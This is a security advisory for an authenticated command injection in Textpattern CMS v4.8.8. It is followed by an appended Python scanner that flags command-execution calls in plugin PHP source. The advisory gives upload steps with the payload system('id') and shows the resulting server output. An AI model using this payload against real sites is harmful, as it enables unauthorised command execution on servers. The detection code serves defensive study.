# Exploit Title: Textpattern CMS v4.8.8 - Command Injection (Authenticated)
# Date: 2023-06-15
# Exploit Author: tmrswrr
# Vendor Homepage: https://textpattern.com/
# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip
# Version: v4.8.8
# Tested: https://release-demo.textpattern.co/

--- Description ---

Textpattern CMS Upload Plugin Command Injection:

1) Log in to the admin page, choose Plugin, and choose a command.php file containing this payload: system('id');
2) Save it, set Active plugin to yes, and click Update from disk
3) After opening the page you will see the result:

https://release-demo.textpattern.co/

uid=33(www-data) gid=33(www-data) groups=33(www-data)
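
A defender-side check for the kind of plugin file described above, as an added example that is not part of the original advisory or of Textpattern: it scans plugin PHP source for direct calls to command-execution functions such as the system('id') payload, ignoring comments and string literals. The function names and the sample plugin are constructed for illustration, and it assumes the plugin is available as plain PHP source.

```python
import re

# PHP built-ins that run OS commands; the advisory's payload uses system().
EXEC_FUNCS = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open", "pcntl_exec")
# Skip method calls ($o->exec), static calls (A::exec) and longer names (my_exec).
_CALL = re.compile(r"(?<![\w$>:\\])\\?(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.I)

def blank_comments_and_strings(src):
    """Replace PHP comments and quoted strings with spaces, keeping newlines.
    Heredocs are not handled (assumption: simple plugin source)."""
    out, i, n = [], 0, len(src)
    while i < n:
        if src[i] in "'\"":                      # quoted string, honour backslash escapes
            quote, j = src[i], i + 1
            while j < n and src[j] != quote:
                j += 2 if src[j] == "\\" else 1
            end = min(j + 1, n)
        elif src.startswith("/*", i):            # block comment
            j = src.find("*/", i + 2)
            end = n if j < 0 else j + 2
        elif src.startswith("//", i) or src[i] == "#":   # line comment
            j = src.find("\n", i)
            end = n if j < 0 else j
        else:
            out.append(src[i])
            i += 1
            continue
        out.append("".join(c if c == "\n" else " " for c in src[i:end]))
        i = end
    return "".join(out)

def find_command_calls(src):
    """Return (line_no, function, source_line) for each direct command-execution call."""
    cleaned = blank_comments_and_strings(src)
    lines = src.split("\n")
    hits = []
    for m in _CALL.finditer(cleaned):
        line_no = cleaned.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(1).lower(), lines[line_no - 1].strip()))
    return hits

# Constructed sample plugin file (only the system('id') line comes from the advisory).
SAMPLE_PLUGIN = """<?php
// demo plugin: the text system('x') in a comment is ignored
$note = "docs at https://example.test/system(";
function abc_hello() { return 'hello'; }
system('id');
$r = $obj->exec($q);
"""

if __name__ == "__main__":
    for line_no, func, text in find_command_calls(SAMPLE_PLUGIN):
        print(f"line {line_no}: {func}() -> {text}")
```

Because string literals are blanked, calls made indirectly through a function name held in a string are not reported, so an empty result does not prove a plugin is harmless.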